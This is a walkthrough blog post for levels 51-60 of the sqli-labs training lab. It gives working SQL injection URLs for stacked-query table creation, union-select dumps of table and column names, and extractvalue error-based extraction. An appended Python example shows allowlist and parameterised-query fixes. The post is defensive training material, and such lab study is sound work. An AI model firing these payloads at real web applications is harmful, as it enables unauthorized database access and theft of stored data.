sqli-labs Walkthrough: Levels 51-60

The levels start below. If you have not done the earlier levels, you can refer to these articles: sqli-labs Walkthrough: Levels 1-10, sqli-labs Walkthrough: Levels 11-20, sqli-labs Walkthrough: Levels 21-30, sqli-labs Walkthrough: Levels 31-40, sqli-labs Walkthrough: Levels 41-50

Whichever level it is, our ultimate goal is to obtain the user's password and so gain the highest privileges!

If anything in the walkthrough below is missing or unclear, feel free to leave a comment and I will try to help you ~

Level 51

This level is essentially the same as level 38; it is simply a character-type stacked injection: ?sort=1';create table test51 like users;%23

Look at the database and you will find the new table there.

 

 

Level 52

The same as level 50, except that it does not display errors.

?sort=1;create table test52 like users;%23

Stacked injection

 

 

 

 

 

Level 53

The same as level 51; the difference is that errors are not displayed.

?sort=1';create table test53 like users;%23

 

 

 

Level 54

Nothing particularly special about this level, except that the number of queries is limited: you can only enter injection input 10 times, and the count is recorded in a cookie.

Query the database name: ?id=-1%27%20union%20select%201,database(),%273

List the tables: ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

Dump the column names: ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='i58u96bgqr'%23 (the table name at the end is the one we found earlier)

Dump the data: ?id=-1' union select 1,group_concat(secret_6KHN),3 from i58u96bgqr%23 (dumping the data of the table we just found)

Enter the value we just obtained and you get this:

 

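Level 55

The same as the previous level, with a parenthesis added. Testing shows that a parenthesis was added, and input can be entered 14 times in total.

List the tables: ?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23 (the same as the previous level, just with the quote changed to a parenthesis, right?)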

 

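Level 56

The same as before. Testing shows the closure is a single quote plus parenthesis; the other steps are the same, so I won't take screenshots.

Get the database name: ?id=-1') union select 1,database(),3%23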

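Level 57

Testing shows the closure is a double quote; everything else is the same as the previous few levels.

Query the database name: ?id=-1" union select 1,database(),3%23 (basically the same, so no more screenshots)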

 

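Level 58

I find the color scheme of this level rather nice. This level seems to give only 5 attempts...

Later I found there was no echoed output. On checking, it turns out the union select statement cannot be used on this level, so let's try error-based injection.

Get the database name via error-based injection: ?id=0' and extractvalue(1, concat(0x5c, (select database())))%23

That shows error-based injection works. Error-based injection was introduced in an earlier article, so I won't explain it again here.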

Level 59

The same as the previous level, only without the single quote.

Get the database name via error-based injection: ?id=0 and extractvalue(1, concat(0x5c, (select database())))%23

 

Level 60

The same as the previous level, only with a double quote and a parenthesis added: ?id=0")

Get the database name via error-based injection: ?id=0") and extractvalue(1, concat(0x5c, (select database())))%23

Get the table names: ?id=0") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Dump the column names: ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wapsbffje5'),0x7e))--+

Dump the data: ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(secret_XSR5) from wapsbffje5),0x7e))--+

Enter it: RsPZ518K3ZvXCVOvrGbhuqAZ and you've beaten it.

Hahahaha, all 60 levels are finished.

End of levels 51-60
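Seen from the fixing side, the `sort` levels (51-53) and the `id` levels (54-60) need two different repairs, shown here as an added example that is not part of the original post or the lab's own code. Assumptions: Python's built-in sqlite3 stands in for the lab's MySQL database, and the sample rows, the column allowlist and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the lab's `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "carol", "pw1"), (2, "alice", "pw2"), (3, "bob", "pw3")])
    return conn

# ORDER BY takes a column name or position, which cannot be a bound parameter,
# so the request value is only ever used as a key into this allowlist.
SORT_COLUMNS = {"1": "id", "2": "username", "3": "password"}

def list_users(conn, sort):
    """Hardened `sort` handler (levels 51-53): no request text reaches the SQL."""
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise ValueError("unsupported sort value")
    return conn.execute(f"SELECT id, username FROM users ORDER BY {column}").fetchall()

def get_user(conn, user_id):
    """Hardened `id` handler (levels 54-60): the value is bound, not concatenated,
    so no quote or parenthesis inside it can close the surrounding SQL."""
    return conn.execute("SELECT id, username FROM users WHERE id = ?",
                        (user_id,)).fetchall()

def table_names(conn):
    """Current table list, used to confirm that no stacked statement ran."""
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
    return sorted(r[0] for r in rows)

def rejected(conn, sort):
    """True if list_users refuses the value and the schema is unchanged."""
    before = table_names(conn)
    try:
        list_users(conn, sort)
    except ValueError:
        return table_names(conn) == before
    return False
```

The same split applies in any driver: identifiers go through an allowlist, values go through placeholders, and the query call used should be one that executes a single statement only.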

 

This article drew on the following pages:

SQL injection lab sqli-labs: complete walkthrough of levels 1-65

SQLi_Labs walkthrough document [levels 1-65]

sqli-labs 1-65 tutorial

Origin www.cnblogs.com/longshisan/p/12237918.html